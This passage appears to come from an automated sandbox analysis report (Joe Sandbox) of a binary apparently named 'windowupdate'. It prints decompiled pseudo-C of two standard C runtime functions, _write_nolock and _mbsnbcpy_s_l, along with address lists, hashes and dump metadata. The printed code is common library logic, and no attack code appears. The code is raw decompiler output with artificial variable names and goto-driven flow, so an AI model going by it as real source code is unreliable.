				signed int _v88;
				signed int _v92;
				char _v93;
				signed int _v100;
				char _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				signed int _t163;
				signed int _t169;
				signed char _t173;
				signed int _t174;
				intOrPtr* _t177;
				intOrPtr _t185;
				signed int _t187;
				signed int _t189;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr* _t200;
				intOrPtr* _t205;
				intOrPtr* _t209;
				void* _t217;
				void* _t221;
				void* _t222;
				void* _t223;
				void* _t285;
				void* _t286;
				signed int _t287;
				void* _t288;
				void* _t289;

				_t286 = __esi;
				_t285 = __edi;
				_t222 = __ebx;
				_t163 =  *0xdf600c; // 0x71e60372
				_v8 = _t163 ^ _t287;
				if(_a12 != 0) {
					__eflags = _a8;
					if(_a8 == 0) {
						_v112 = 0;
					} else {
						_v112 = 1;
					}
					_v116 = _v112;
					__eflags = _v116;
					if(__eflags == 0) {
						_t221 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0, L"%ls", L"buffer != nullptr");
						_t288 = _t288 + 0x18;
						__eflags = _t221 - 1;
						if(_t221 == 1) {
							asm("int3");
						}
					}
					__eflags = _v116;
					if(_v116 != 0) {
						_v93 =  *((intOrPtr*)( *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4)) + 0x29 + (_a4 & 0x0000003f) * 0x38));
						__eflags = _v93 - 2;
						if(_v93 == 2) {
							L12:
							_t169 = _a12;
							__eflags = _t169 % 2;
							if(_t169 % 2 != 0) {
								_v120 = 0;
							} else {
								_v120 = 1;
							}
							_v124 = _v120;
							__eflags = _v124;
							if(__eflags == 0) {
								_t217 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0, L"%ls", L"buffer_size % 2 == 0");
								_t288 = _t288 + 0x18;
								__eflags = _t217 - 1;
								if(_t217 == 1) {
									asm("int3");
								}
							}
							__eflags = _v124;
							if(_v124 != 0) {
								L20:
								__eflags =  *( *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4)) + 0x28 + (_a4 & 0x0000003f) * 0x38) & 0x20;
								if(__eflags != 0) {
									E00DB5510(_a4, 0, 0, 2);
									_t288 = _t288 + 0x10;
								}
								_v100 = _a8;
								_v20 = 0;
								_v16 = 0;
								_v12 = 0;
								_t173 = E00DB3F00(_t222, _a8, _t286, __eflags, _a4);
								_t289 = _t288 + 4;
								__eflags = _t173 & 0x000000ff;
								if((_t173 & 0x000000ff) == 0) {
									_t174 = (_a4 & 0x0000003f) * 0x38;
									_t233 =  *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4));
									_t270 =  *(_t233 + _t174 + 0x28) & 0x80;
									__eflags =  *(_t233 + _t174 + 0x28) & 0x80;
									if(( *(_t233 + _t174 + 0x28) & 0x80) == 0) {
										_t177 = E00DB3130( &_v196, _a4, _v100, _a12);
										_t289 = _t289 + 0x10;
										_v92 =  *_t177;
										_v88 =  *((intOrPtr*)(_t177 + 4));
										_v84 =  *((intOrPtr*)(_t177 + 8));
										_t233 = _v92;
										_v20 = _v92;
										_t270 = _v88;
										_v16 = _v88;
										_v12 = _v84;
									} else {
										_v108 = _v93;
										__eflags = _v108;
										if(_v108 == 0) {
											_t193 = E00DB3FE0(_t222, _t285, _t286,  &_v160, _a4, _v100, _a12);
											_t289 = _t289 + 0x10;
											_v56 =  *_t193;
											_v52 =  *((intOrPtr*)(_t193 + 4));
											_v48 =  *((intOrPtr*)(_t193 + 8));
											_v20 = _v56;
											_t233 = _v52;
											_v16 = _v52;
											_t270 = _v48;
											_v12 = _v48;
										} else {
											__eflags = _v108 - 1;
											if(_v108 == 1) {
												_t196 = E00DB43F0(_t222, _t285, _t286,  &_v184, _a4, _v100, _a12);
												_t289 = _t289 + 0x10;
												_v80 =  *_t196;
												_v76 =  *((intOrPtr*)(_t196 + 4));
												_v72 =  *((intOrPtr*)(_t196 + 8));
												_v20 = _v80;
												_t233 = _v76;
												_v16 = _v76;
												_t270 = _v72;
												_v12 = _v72;
											} else {
												__eflags = _v108 - 2;
												if(_v108 == 2) {
													_t200 = E00DB41E0(_t222, _t285, _t286,  &_v172, _a4, _v100, _a12);
													_t289 = _t289 + 0x10;
													_v68 =  *_t200;
													_v64 =  *((intOrPtr*)(_t200 + 4));
													_v60 =  *((intOrPtr*)(_t200 + 8));
													_t233 = _v68;
													_v20 = _v68;
													_t270 = _v64;
													_v16 = _v64;
													_v12 = _v60;
												}
											}
										}
									}
								} else {
									_t270 = _v93;
									_v104 = _v93;
									__eflags = _v104;
									if(__eflags == 0) {
										_t205 = E00DB31C0(_t222, _t285, _t286, __eflags,  &_v136, _a4, _v100, _a12);
										_t289 = _t289 + 0x10;
										_v32 =  *_t205;
										_v28 =  *((intOrPtr*)(_t205 + 4));
										_v24 =  *((intOrPtr*)(_t205 + 8));
										_t233 = _v32;
										_v20 = _v32;
										_t270 = _v28;
										_v16 = _v28;
										_v12 = _v24;
									} else {
										__eflags = _v104;
										if(_v104 > 0) {
											__eflags = _v104 - 2;
											if(_v104 <= 2) {
												_t209 = E00DB3DF0(_t222, _t285, _t286,  &_v148, _v100, _a12);
												_t289 = _t289 + 0xc;
												_v44 =  *_t209;
												_v40 =  *((intOrPtr*)(_t209 + 4));
												_v36 =  *((intOrPtr*)(_t209 + 8));
												_t233 = _v44;
												_v20 = _v44;
												_t270 = _v40;
												_v16 = _v40;
												_v12 = _v36;
											}
										}
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t181 = _v16 - _v12;
									__eflags = _v16 - _v12;
								} else {
									__eflags = _v20;
									if(_v20 == 0) {
										_t270 = (_a4 & 0x0000003f) * 0x38;
										_t185 =  *((intOrPtr*)(0xf21198 + (_a4 >> 6) * 4));
										_t241 =  *(_t185 + _t270 + 0x28) & 0x40;
										__eflags =  *(_t185 + _t270 + 0x28) & 0x40;
										if(( *(_t185 + _t270 + 0x28) & 0x40) == 0) {
											L49:
											 *((intOrPtr*)(L00D82F70(_t241))) = 0x1c;
											_t187 = E00D82F40(_t241);
											 *_t187 = 0;
											_t181 = _t187 | 0xffffffff;
											goto L51;
										}
										_t270 = _v100;
										__eflags =  *_v100 - 0x1a;
										if( *_v100 != 0x1a) {
											goto L49;
										}
										_t181 = 0;
										goto L51;
									}
									__eflags = _v20 - 5;
									if(_v20 != 5) {
										_t270 = _v20;
										_t189 = E00D82F10(_t233, _v20);
									} else {
										 *((intOrPtr*)(L00D82F70(_t233))) = 9;
										_t189 = E00D82F40(_t233);
										 *_t189 = _v20;
									}
									_t181 = _t189 | 0xffffffff;
								}
							} else {
								 *((intOrPtr*)(E00D82F40(2))) = 0;
								 *((intOrPtr*)(L00D82F70(2))) = 0x16;
								_t181 = E00D82900(L"buffer_size % 2 == 0", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0) | 0xffffffff;
							}
							goto L51;
						}
						__eflags = _v93 - 1;
						if(_v93 != 1) {
							goto L20;
						}
						goto L12;
					} else {
						 *((intOrPtr*)(E00D82F40(_t223))) = 0;
						 *((intOrPtr*)(L00D82F70(_t223))) = 0x16;
						_t181 = E00D82900(L"buffer != nullptr", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0) | 0xffffffff;
						goto L51;
					}
				} else {
					_t181 = 0;
					L51:
					return E00D47280(_t181, _t222, _v8 ^ _t287, _t270, _t285, _t286);
				}
			}





























































                      0x00db48f0
                      0x00db48f0
                      0x00db48f0
                      0x00db48fb
                      0x00db4902
                      0x00db4909
                      0x00db4912
                      0x00db4916
                      0x00db4921
                      0x00db4918
                      0x00db4918
                      0x00db4918
                      0x00db492b
                      0x00db492e
                      0x00db4932
                      0x00db494c
                      0x00db4951
                      0x00db4954
                      0x00db4957
                      0x00db4959
                      0x00db4959
                      0x00db4957
                      0x00db495a
                      0x00db495e
                      0x00db49b6
                      0x00db49b9
                      0x00db49bd
                      0x00db49c9
                      0x00db49c9
                      0x00db49d5
                      0x00db49d7
                      0x00db49e2
                      0x00db49d9
                      0x00db49d9
                      0x00db49d9
                      0x00db49ec
                      0x00db49ef
                      0x00db49f3
                      0x00db4a0d
                      0x00db4a12
                      0x00db4a15
                      0x00db4a18
                      0x00db4a1a
                      0x00db4a1a
                      0x00db4a18
                      0x00db4a1b
                      0x00db4a1f
                      0x00db4a5d
                      0x00db4a78
                      0x00db4a7b
                      0x00db4a87
                      0x00db4a8c
                      0x00db4a8c
                      0x00db4a92
                      0x00db4a97
                      0x00db4a9a
                      0x00db4a9d
                      0x00db4aa4
                      0x00db4aa9
                      0x00db4aaf
                      0x00db4ab1
                      0x00db4b60
                      0x00db4b63
                      0x00db4b6f
                      0x00db4b6f
                      0x00db4b75
                      0x00db4c6f
                      0x00db4c74
                      0x00db4c79
                      0x00db4c7f
                      0x00db4c85
                      0x00db4c88
                      0x00db4c8b
                      0x00db4c8e
                      0x00db4c91
                      0x00db4c97
                      0x00db4b7b
                      0x00db4b7e
                      0x00db4b81
                      0x00db4b85
                      0x00db4baf
                      0x00db4bb4
                      0x00db4bb9
                      0x00db4bbf
                      0x00db4bc5
                      0x00db4bcb
                      0x00db4bce
                      0x00db4bd1
                      0x00db4bd4
                      0x00db4bd7
                      0x00db4b87
                      0x00db4b87
                      0x00db4b8b
                      0x00db4c2f
                      0x00db4c34
                      0x00db4c39
                      0x00db4c3f
                      0x00db4c45
                      0x00db4c4b
                      0x00db4c4e
                      0x00db4c51
                      0x00db4c54
                      0x00db4c57
                      0x00db4b91
                      0x00db4b91
                      0x00db4b95
                      0x00db4bef
                      0x00db4bf4
                      0x00db4bf9
                      0x00db4bff
                      0x00db4c05
                      0x00db4c08
                      0x00db4c0b
                      0x00db4c0e
                      0x00db4c11
                      0x00db4c17
                      0x00db4c17
                      0x00db4b95
                      0x00db4b8b
                      0x00db4c5a
                      0x00db4ab7
                      0x00db4ab7
                      0x00db4aba
                      0x00db4abd
                      0x00db4ac1
                      0x00db4ae8
                      0x00db4aed
                      0x00db4af2
                      0x00db4af8
                      0x00db4afe
                      0x00db4b01
                      0x00db4b04
                      0x00db4b07
                      0x00db4b0a
                      0x00db4b10
                      0x00db4ac3
                      0x00db4ac3
                      0x00db4ac7
                      0x00db4acd
                      0x00db4ad1
                      0x00db4b24
                      0x00db4b29
                      0x00db4b2e
                      0x00db4b34
                      0x00db4b3a
                      0x00db4b3d
                      0x00db4b40
                      0x00db4b43
                      0x00db4b46
                      0x00db4b4c
                      0x00db4b4c
                      0x00db4ad1
                      0x00db4ac7
                      0x00db4b4f
                      0x00db4c9a
                      0x00db4c9e
                      0x00db4d21
                      0x00db4d21
                      0x00db4ca0
                      0x00db4ca0
                      0x00db4ca4
                      0x00db4ce0
                      0x00db4ce3
                      0x00db4cef
                      0x00db4cef
                      0x00db4cf2
                      0x00db4d03
                      0x00db4d08
                      0x00db4d0e
                      0x00db4d13
                      0x00db4d19
                      0x00000000
                      0x00db4d19
                      0x00db4cf4
                      0x00db4cfa
                      0x00db4cfd
                      0x00000000
                      0x00000000
                      0x00db4cff
                      0x00000000
                      0x00db4cff
                      0x00db4ca6
                      0x00db4caa
                      0x00db4cc3
                      0x00db4cc7
                      0x00db4cac
                      0x00db4cb1
                      0x00db4cb7
                      0x00db4cbf
                      0x00db4cbf
                      0x00db4ccf
                      0x00db4ccf
                      0x00db4a21
                      0x00db4a26
                      0x00db4a31
                      0x00db4a55
                      0x00db4a55
                      0x00000000
                      0x00db4a1f
                      0x00db49bf
                      0x00db49c3
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00db4960
                      0x00db4965
                      0x00db4970
                      0x00db4994
                      0x00000000
                      0x00db4994
                      0x00db490b
                      0x00db490b
                      0x00db4d24
                      0x00db4d31
                      0x00db4d31

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$_write_nolock$buffer != nullptr$buffer_size % 2 == 0$minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
                      • API String ID: 0-1420694404
                      • Opcode ID: 80b047ed19ba85e4966abcacf07e8e346ea26893d171846ea84d67ee701d5711
                      • Instruction ID: 4ab6eeeb14b27325875d399fdb6d405bfaf06b9c6fa0e8bda14108471e996bee
                      • Opcode Fuzzy Hash: 80b047ed19ba85e4966abcacf07e8e346ea26893d171846ea84d67ee701d5711
                      • Instruction Fuzzy Hash: 79E158B4E00248EFDB14DF99C885BEEBBF5AF48304F188159E51AAB396D7709941CF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9C35F Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 324COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00D9C35F(void* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				intOrPtr* _t65;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr* _t73;
				void* _t77;
				signed char _t82;
				signed int _t83;
				signed char _t86;
				void* _t87;
				intOrPtr* _t88;
				void* _t90;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				void* _t101;
				void* _t102;
				void* _t106;
				signed int _t109;
				char* _t110;
				signed int _t111;
				signed char* _t112;
				intOrPtr _t115;
				void* _t116;
				signed int _t118;
				signed char* _t120;
				signed int _t121;
				void* _t122;
				signed char* _t123;
				signed int _t124;
				signed char* _t126;
				signed int _t127;
				char* _t128;
				intOrPtr _t131;
				signed int _t132;
				intOrPtr* _t133;
				intOrPtr _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;
				void* _t138;
				void* _t139;

				_t116 = __ecx;
				_t109 = _a16;
				_t63 = 0;
				_v12 = 0;
				_t127 = _a4;
				if(_t109 != 0) {
					__eflags = _t127;
					if(__eflags == 0) {
						L3:
						_t110 = L"((_Dst)) != NULL && ((_SizeInBytes)) > 0";
						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
						if(L00D84930(_t149, 2, _t128, 0x1e, _t63, L"%ls", _t110) == 1) {
							asm("int3");
						}
						_t65 = L00D82F70(_t116);
						_t131 = 0x16;
						_push(0);
						_push(0x1e);
						L6:
						_push(_t128);
						_push(L"_mbsnbcpy_s_l");
						_push(_t110);
						 *_t65 = _t131;
						E00D82900();
						L7:
						return _t131;
					}
					L10:
					_t132 = _a8;
					__eflags = _t132;
					if(__eflags == 0) {
						goto L3;
					}
					__eflags = _t109;
					if(_t109 != 0) {
						__eflags = _a12 - _t63;
						if(_a12 != _t63) {
							L00D66CC0(_t109,  &_v28, _t132, _a20);
							_t69 = _v20;
							__eflags =  *(_t69 + 8);
							if( *(_t69 + 8) != 0) {
								_t118 = _t132;
								_t121 = _t127;
								_v8 = _t118;
								__eflags = _t109 - 0xffffffff;
								if(_t109 != 0xffffffff) {
									_t133 = _a12;
									while(1) {
										_t70 =  *_t133;
										 *_t121 = _t70;
										_t121 = _t121 + 1;
										_t133 = _t133 + 1;
										__eflags = _t70;
										if(_t70 == 0) {
											break;
										}
										_t118 = _t118 - 1;
										__eflags = _t118;
										if(_t118 == 0) {
											break;
										}
										_t109 = _t109 - 1;
										__eflags = _t109;
										if(_t109 != 0) {
											continue;
										}
										break;
									}
									_a12 = _t133;
									_t132 = _a8;
									_v8 = _t118;
									__eflags = _t109;
									if(_t109 == 0) {
										 *_t121 = 0;
										_t121 = _t121 + 1;
										__eflags = _t121;
									}
									L41:
									__eflags = _t118;
									if(_t118 != 0) {
										__eflags = _t121 - _t127 - 2;
										if(_t121 - _t127 < 2) {
											L79:
											_t111 = _v12;
											L80:
											__eflags = _t132 - 0xffffffff;
											if(_t132 != 0xffffffff) {
												__eflags = _t132 - 0x7fffffff;
												if(_t132 != 0x7fffffff) {
													__eflags = _t132 - _t118 + 1 - _t132;
													if(_t132 - _t118 + 1 < _t132) {
														_t77 = E00D950C0();
														_t118 = _v8;
														_t122 = _t118 - 1;
														__eflags = _t77 - _t122;
														if(_t77 >= _t122) {
															_t77 = _t122;
														}
														__eflags = _t132 + 1 + _t127 - _t118;
														E00D4AF80(_t127 - _t118, _t132 + 1 + _t127 - _t118, 0xfe, _t77);
													}
												}
											}
											__eflags = _t111;
											if(_t111 == 0) {
												_t131 = 0;
												__eflags = 0;
												goto L89;
											} else {
												L87:
												_t73 = L00D82F70(_t118);
												_t131 = 0x2a;
												 *_t73 = _t131;
												L89:
												__eflags = _v16;
												if(_v16 != 0) {
													 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
												}
												goto L7;
											}
										}
										_t112 = _t121 - 2;
										_t123 = _t112;
										__eflags = _t112 - _t127;
										if(_t112 < _t127) {
											L77:
											_t82 = _t112 - _t123;
											__eflags = _t82 & 0x00000001;
											if((_t82 & 0x00000001) == 0) {
												goto L79;
											}
											 *_t112 = 0;
											_t118 = _t118 + 1;
											_v8 = _t118;
											_t111 = 1;
											goto L80;
										}
										_t134 = _v20;
										while(1) {
											_t83 =  *_t123 & 0x000000ff;
											__eflags =  *(_t83 + _t134 + 0x19) & 0x00000004;
											if(( *(_t83 + _t134 + 0x19) & 0x00000004) == 0) {
												break;
											}
											_t123 = _t123 - 1;
											__eflags = _t123 - _t127;
											if(_t123 >= _t127) {
												continue;
											}
											break;
										}
										_t132 = _a8;
										goto L77;
									}
									__eflags =  *_a12 - _t118;
									if( *_a12 == _t118) {
										L44:
										_t124 = _t121 - 1;
										_t118 = _t124;
										__eflags = _t124 - _t127;
										if(_t124 < _t127) {
											L49:
											_t86 = _t124 - _t118;
											__eflags = _t86 & 0x00000001;
											if((_t86 & 0x00000001) == 0) {
												L51:
												__eflags = _t109 - 0xffffffff;
												if(_t109 != 0xffffffff) {
													 *_t127 = 0;
													__eflags = _t132 - 0xffffffff;
													if(__eflags != 0) {
														__eflags = _t132 - 0x7fffffff;
														if(__eflags != 0) {
															__eflags = _t132 - 1;
															if(__eflags > 0) {
																_t90 = E00D950C0();
																_t135 = _t132 - 1;
																__eflags = _t90 - _t135;
																if(_t90 >= _t135) {
																	_t90 = _t135;
																}
																E00D4AF80(_t127, _t127 + 1, 0xfe, _t90);
																_t139 = _t139 + 0xc;
															}
														}
													}
													_t130 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
													_t87 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl", 0xae, 0, L"%ls", L"(L\"Buffer is too small\" && 0)");
													__eflags = _t87 - 1;
													if(_t87 == 1) {
														asm("int3");
													}
													_t88 = L00D82F70(_t118);
													_t131 = 0x22;
													 *_t88 = _t131;
													E00D82900(L"(L\"Buffer is too small\" && 0)", L"_mbsnbcpy_s_l", _t130, 0xae, 0);
													goto L89;
												}
												__eflags = _t132 - 1;
												if(_t132 <= 1) {
													L60:
													 *((char*)(_t127 + _t132 - 1)) = 0;
													L61:
													_t131 = 0x50;
													goto L89;
												}
												_t126 = _t132 - 2 + _t127;
												_t120 = _t126;
												__eflags = _t126 - _t127;
												if(_t126 < _t127) {
													L57:
													_t94 = _t126 - _t120;
													__eflags = _t94 & 0x00000001;
													if((_t94 & 0x00000001) == 0) {
														goto L60;
													}
													 *_t126 = 0;
													_t95 = E00D950C0();
													__eflags = _t95;
													if(_t95 != 0) {
														 *((char*)(_t127 + _t132 - 1)) = 0xfe;
													}
													goto L61;
												}
												_t115 = _v20;
												while(1) {
													_t96 =  *_t120 & 0x000000ff;
													__eflags =  *(_t96 + _t115 + 0x19) & 0x00000004;
													if(( *(_t96 + _t115 + 0x19) & 0x00000004) == 0) {
														goto L57;
													}
													_t120 = _t120 - 1;
													__eflags = _t120 - _t127;
													if(_t120 >= _t127) {
														continue;
													}
													goto L57;
												}
												goto L57;
											}
											 *_t124 = 0;
											goto L87;
										}
										_t136 = _v20;
										while(1) {
											_t97 =  *_t118 & 0x000000ff;
											__eflags =  *(_t97 + _t136 + 0x19) & 0x00000004;
											if(( *(_t97 + _t136 + 0x19) & 0x00000004) == 0) {
												break;
											}
											_t118 = _t118 - 1;
											__eflags = _t118 - _t127;
											if(_t118 >= _t127) {
												continue;
											}
											break;
										}
										_t132 = _a8;
										goto L49;
									}
									__eflags = _t109 - 1;
									if(_t109 != 1) {
										goto L51;
									}
									goto L44;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t99 =  *_a12;
									 *_t121 = _t99;
									_t121 = _t121 + 1;
									_a12 = _a12 + 1;
									__eflags = _t99;
									if(_t99 == 0) {
										goto L41;
									}
									_t118 = _t118 - 1;
									__eflags = _t118;
									_v8 = _t118;
									if(_t118 != 0) {
										continue;
									}
									goto L41;
								}
								goto L41;
							}
							_t131 = E00DB09A0(_t127, _t132, _a12, _t109);
							goto L89;
						}
						 *_t127 = _t63;
						__eflags = _t132 - 0xffffffff;
						if(__eflags != 0) {
							__eflags = _t132 - 0x7fffffff;
							if(__eflags != 0) {
								__eflags = _t132 - 1;
								if(__eflags > 0) {
									_t102 = E00D950C0();
									_t137 = _t132 - 1;
									__eflags = _t102 - _t137;
									if(_t102 >= _t137) {
										_t102 = _t137;
									}
									E00D4AF80(_t127, _t127 + 1, 0xfe, _t102);
									_t139 = _t139 + 0xc;
									_t63 = 0;
									__eflags = 0;
								}
							}
						}
						_t110 = L"(((_Src))) != NULL";
						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
						_t101 = L00D84930(__eflags, 2, _t128, 0x26, _t63, L"%ls", _t110);
						__eflags = _t101 - 1;
						if(_t101 == 1) {
							asm("int3");
						}
						_t65 = L00D82F70(_t116);
						_t131 = 0x16;
						_push(0);
						_push(0x26);
						goto L6;
					} else {
						 *_t127 = _t63;
						__eflags = _t132 - 0xffffffff;
						if(_t132 != 0xffffffff) {
							__eflags = _t132 - 0x7fffffff;
							if(_t132 != 0x7fffffff) {
								__eflags = _t132 - 1;
								if(_t132 > 1) {
									_t106 = E00D950C0();
									_t138 = _t132 - 1;
									__eflags = _t106 - _t138;
									if(_t106 >= _t138) {
										_t106 = _t138;
									}
									E00D4AF80(_t127, _t127 + 1, 0xfe, _t106);
								}
							}
						}
						L18:
						return 0;
					}
				}
				if(_t127 != 0) {
					goto L10;
				}
				_t149 = _a8;
				if(_a8 == 0) {
					goto L18;
				}
				goto L3;
			}























































                      0x00d9c35f
                      0x00d9c368
                      0x00d9c36b
                      0x00d9c36d
                      0x00d9c372
                      0x00d9c377
                      0x00d9c3d0
                      0x00d9c3d2
                      0x00d9c386
                      0x00d9c386
                      0x00d9c38b
                      0x00d9c3a7
                      0x00d9c3a9
                      0x00d9c3a9
                      0x00d9c3aa
                      0x00d9c3b1
                      0x00d9c3b2
                      0x00d9c3b4
                      0x00d9c3b6
                      0x00d9c3b6
                      0x00d9c3b7
                      0x00d9c3bc
                      0x00d9c3bd
                      0x00d9c3bf
                      0x00d9c3c7
                      0x00000000
                      0x00d9c3c7
                      0x00d9c3d4
                      0x00d9c3d4
                      0x00d9c3d7
                      0x00d9c3d9
                      0x00000000
                      0x00000000
                      0x00d9c3db
                      0x00d9c3dd
                      0x00d9c415
                      0x00d9c418
                      0x00d9c489
                      0x00d9c48e
                      0x00d9c491
                      0x00d9c495
                      0x00d9c4ac
                      0x00d9c4ae
                      0x00d9c4b0
                      0x00d9c4b3
                      0x00d9c4b6
                      0x00d9c4d1
                      0x00d9c4d4
                      0x00d9c4d4
                      0x00d9c4d6
                      0x00d9c4d8
                      0x00d9c4d9
                      0x00d9c4da
                      0x00d9c4dc
                      0x00000000
                      0x00000000
                      0x00d9c4de
                      0x00d9c4de
                      0x00d9c4e1
                      0x00000000
                      0x00000000
                      0x00d9c4e3
                      0x00d9c4e3
                      0x00d9c4e6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9c4e6
                      0x00d9c4e8
                      0x00d9c4eb
                      0x00d9c4ee
                      0x00d9c4f1
                      0x00d9c4f3
                      0x00d9c4f5
                      0x00d9c4f8
                      0x00d9c4f8
                      0x00d9c4f8
                      0x00d9c4f9
                      0x00d9c4f9
                      0x00d9c4fb
                      0x00d9c60e
                      0x00d9c611
                      0x00d9c645
                      0x00d9c645
                      0x00d9c648
                      0x00d9c648
                      0x00d9c64b
                      0x00d9c64d
                      0x00d9c653
                      0x00d9c65a
                      0x00d9c65c
                      0x00d9c65e
                      0x00d9c663
                      0x00d9c666
                      0x00d9c669
                      0x00d9c66b
                      0x00d9c66d
                      0x00d9c66d
                      0x00d9c675
                      0x00d9c67d
                      0x00d9c682
                      0x00d9c65c
                      0x00d9c653
                      0x00d9c685
                      0x00d9c687
                      0x00d9c695
                      0x00d9c695
                      0x00000000
                      0x00d9c689
                      0x00d9c689
                      0x00d9c689
                      0x00d9c690
                      0x00d9c691
                      0x00d9c697
                      0x00d9c697
                      0x00d9c69b
                      0x00d9c6a4
                      0x00d9c6a4
                      0x00000000
                      0x00d9c69b
                      0x00d9c687
                      0x00d9c613
                      0x00d9c616
                      0x00d9c618
                      0x00d9c61a
                      0x00d9c631
                      0x00d9c633
                      0x00d9c635
                      0x00d9c637
                      0x00000000
                      0x00000000
                      0x00d9c639
                      0x00d9c63c
                      0x00d9c63f
                      0x00d9c642
                      0x00000000
                      0x00d9c642
                      0x00d9c61c
                      0x00d9c61f
                      0x00d9c61f
                      0x00d9c622
                      0x00d9c627
                      0x00000000
                      0x00000000
                      0x00d9c629
                      0x00d9c62a
                      0x00d9c62c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9c62c
                      0x00d9c62e
                      0x00000000
                      0x00d9c62e
                      0x00d9c504
                      0x00d9c506
                      0x00d9c50d
                      0x00d9c50d
                      0x00d9c50e
                      0x00d9c510
                      0x00d9c512
                      0x00d9c529
                      0x00d9c52b
                      0x00d9c52d
                      0x00d9c52f
                      0x00d9c539
                      0x00d9c539
                      0x00d9c53c
                      0x00d9c58a
                      0x00d9c58c
                      0x00d9c58f
                      0x00d9c591
                      0x00d9c597
                      0x00d9c599
                      0x00d9c59c
                      0x00d9c59e
                      0x00d9c5a3
                      0x00d9c5a4
                      0x00d9c5a6
                      0x00d9c5a8
                      0x00d9c5a8
                      0x00d9c5b4
                      0x00d9c5b9
                      0x00d9c5b9
                      0x00d9c59c
                      0x00d9c597
                      0x00d9c5cc
                      0x00d9c5d4
                      0x00d9c5dc
                      0x00d9c5df
                      0x00d9c5e1
                      0x00d9c5e1
                      0x00d9c5e2
                      0x00d9c5e9
                      0x00d9c5fb
                      0x00d9c5fd
                      0x00000000
                      0x00d9c602
                      0x00d9c53e
                      0x00d9c541
                      0x00d9c57b
                      0x00d9c57b
                      0x00d9c580
                      0x00d9c582
                      0x00000000
                      0x00d9c582
                      0x00d9c546
                      0x00d9c548
                      0x00d9c54a
                      0x00d9c54c
                      0x00d9c560
                      0x00d9c562
                      0x00d9c564
                      0x00d9c566
                      0x00000000
                      0x00000000
                      0x00d9c568
                      0x00d9c56b
                      0x00d9c570
                      0x00d9c572
                      0x00d9c574
                      0x00d9c574
                      0x00000000
                      0x00d9c572
                      0x00d9c54e
                      0x00d9c551
                      0x00d9c551
                      0x00d9c554
                      0x00d9c559
                      0x00000000
                      0x00000000
                      0x00d9c55b
                      0x00d9c55c
                      0x00d9c55e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9c55e
                      0x00000000
                      0x00d9c551
                      0x00d9c531
                      0x00000000
                      0x00d9c531
                      0x00d9c514
                      0x00d9c517
                      0x00d9c517
                      0x00d9c51a
                      0x00d9c51f
                      0x00000000
                      0x00000000
                      0x00d9c521
                      0x00d9c522
                      0x00d9c524
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9c524
                      0x00d9c526
                      0x00000000
                      0x00d9c526
                      0x00d9c508
                      0x00d9c50b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d9c4b8
                      0x00d9c4b8
                      0x00d9c4bb
                      0x00d9c4bd
                      0x00d9c4bf
                      0x00d9c4c0
                      0x00d9c4c3
                      0x00d9c4c5
                      0x00000000
                      0x00000000
                      0x00d9c4c7
                      0x00d9c4c7
                      0x00d9c4ca
                      0x00d9c4cd
                      0x00000000
                      0x00000000
                      0x00000000
